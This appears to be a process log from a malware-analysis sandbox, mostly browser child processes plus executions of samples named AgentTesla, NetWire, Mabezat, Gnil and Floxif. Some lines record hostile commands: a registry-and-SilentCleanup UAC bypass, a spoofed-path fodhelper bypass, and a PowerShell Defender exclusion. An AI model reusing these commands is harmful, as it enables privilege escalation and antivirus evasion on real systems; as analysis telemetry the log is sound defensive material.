"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4448 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4440 -prefMapHandle 4436 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48c90701-caa1-473c-a6cd-aa5bfc019fc8} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 3 -isForBrowser -prefsHandle 5572 -prefMapHandle 5568 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d14e0cb-2f9b-47c9-8585-a770bb19e6c2} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 4 -isForBrowser -prefsHandle 5684 -prefMapHandle 5692 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f054924d-a14b-430f-a7c0-62e54d651bcb} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5832 -childID 5 -isForBrowser -prefsHandle 5660 -prefMapHandle 5824 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {246a30cb-6a8d-4338-84c4-ef38ad9a7673} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6280 -childID 6 -isForBrowser -prefsHandle 6196 -prefMapHandle 6256 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1de4a37d-6585-4e41-ba9e-d39ca9861e0b} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6620 -childID 7 -isForBrowser -prefsHandle 6592 -prefMapHandle 6496 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {463c799b-51cf-48bd-b469-f9663597a1a8} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6740 -childID 8 -isForBrowser -prefsHandle 6820 -prefMapHandle 6816 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c599aa85-6427-465d-8ea0-64e4a85e781b} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6920 -childID 9 -isForBrowser -prefsHandle 6928 -prefMapHandle 6932 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {033efa49-c8ad-4464-8f41-2d1045ba5282} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3760 -childID 10 -isForBrowser -prefsHandle 3592 -prefMapHandle 3860 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a27fec1a-e250-445d-899c-20fa3bc3f01a} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5660 -childID 11 -isForBrowser -prefsHandle 6492 -prefMapHandle 5860 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e98defa1-84ba-4d9e-abbc-c7a5212f3604} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 12 -isForBrowser -prefsHandle 5936 -prefMapHandle 5940 -prefsLen 27172 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c6d46063-a24c-435b-a0a4-c84b5f2e528c} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe
"C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/about/terms-of-service
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc3a1e46f8,0x7ffc3a1e4708,0x7ffc3a1e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1844 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1888,15795301034767576225,16501545227801523191,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4944 -childID 13 -isForBrowser -prefsHandle 4936 -prefMapHandle 4956 -prefsLen 30493 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {51632daf-82e8-4460-b21b-54f9cac381fe} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1460 -childID 14 -isForBrowser -prefsHandle 1456 -prefMapHandle 6128 -prefsLen 28038 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ce41d50-c1c1-48be-898d-1c1e718e56b9} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Users\Admin\Desktop\AgentTesla.exe
"C:\Users\Admin\Desktop\AgentTesla.exe"
C:\Users\Admin\Desktop\AgentTesla.exe
"C:\Users\Admin\Desktop\AgentTesla.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7296 -childID 15 -isForBrowser -prefsHandle 1668 -prefMapHandle 4064 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08e562a1-6159-4a25-b748-557d06a3c40f} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x340 0x4f8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/086d35f26bd2fd886e99744960b394d94e74133c40145a3e2bc6b3877b91ec5d/detection
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc37f946f8,0x7ffc37f94708,0x7ffc37f94718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2844 /prefetch:8
C:\Windows\SysWOW64\Notepad.exe
C:\Windows\System32\Notepad.exe
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
C:\Windows\SysWOW64\reg.exe
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7060 -childID 16 -isForBrowser -prefsHandle 7008 -prefMapHandle 6020 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {13b938ea-454f-4cab-8669-870e3d75703d} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6028 -childID 17 -isForBrowser -prefsHandle 5920 -prefMapHandle 6644 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a43d8a69-923a-4c62-a458-8d1adcbc6a9e} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6752 -childID 18 -isForBrowser -prefsHandle 6340 -prefMapHandle 6824 -prefsLen 28094 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b38b883-98eb-4ded-8bad-30b11ca77e63} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,17340913330304293143,2980833413579613384,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "
C:\Windows \System32\fodhelper.exe
"C:\Windows \System32\fodhelper.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Public\x.vbs
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Users\Admin\Desktop\NetWire.exe
"C:\Users\Admin\Desktop\NetWire.exe"
C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap16696:70:7zEvent1363
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\Walker\" -ad -an -ai#7zMap15300:70:7zEvent19357
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/gui/file/2ae0c4a5f1fedf964e2f8a486bf0ee5d1816aac30c889458a9ac113d13b50ceb/detection
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc381a46f8,0x7ffc381a4708,0x7ffc381a4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,7306956145256140070,15832123627203540688,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5564 /prefetch:8
C:\Users\Admin\Downloads\Gnil.exe
"C:\Users\Admin\Downloads\Gnil.exe"
C:\Windows\SysWOW64\drivers\spoclsv.exe
C:\Windows\system32\drivers\spoclsv.exe
C:\Users\Admin\Downloads\Gnil.exe
"C:\Users\Admin\Downloads\Gnil.exe"
C:\Windows\SysWOW64\drivers\spoclsv.exe
C:\Windows\system32\drivers\spoclsv.exe
C:\Users\Admin\Downloads\Gnil.exe
"C:\Users\Admin\Downloads\Gnil.exe"
C:\Windows\SysWOW64\drivers\spoclsv.exe
C:\Windows\system32\drivers\spoclsv.exe
C:\Users\Admin\Downloads\Gnil.exe
"C:\Users\Admin\Downloads\Gnil.exe"
C:\Windows\SysWOW64\drivers\spoclsv.exe
C:\Windows\system32\drivers\spoclsv.exe
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 6216 -ip 6216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6216 -s 432
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5352 -ip 5352
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6252 -ip 6252
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7192 -ip 7192
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7192 -s 400
C:\Users\Admin\Downloads\Floxif.exe
"C:\Users\Admin\Downloads\Floxif.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3384 -ip 3384
C:\Windows\SysWOW64\WerFault.exe
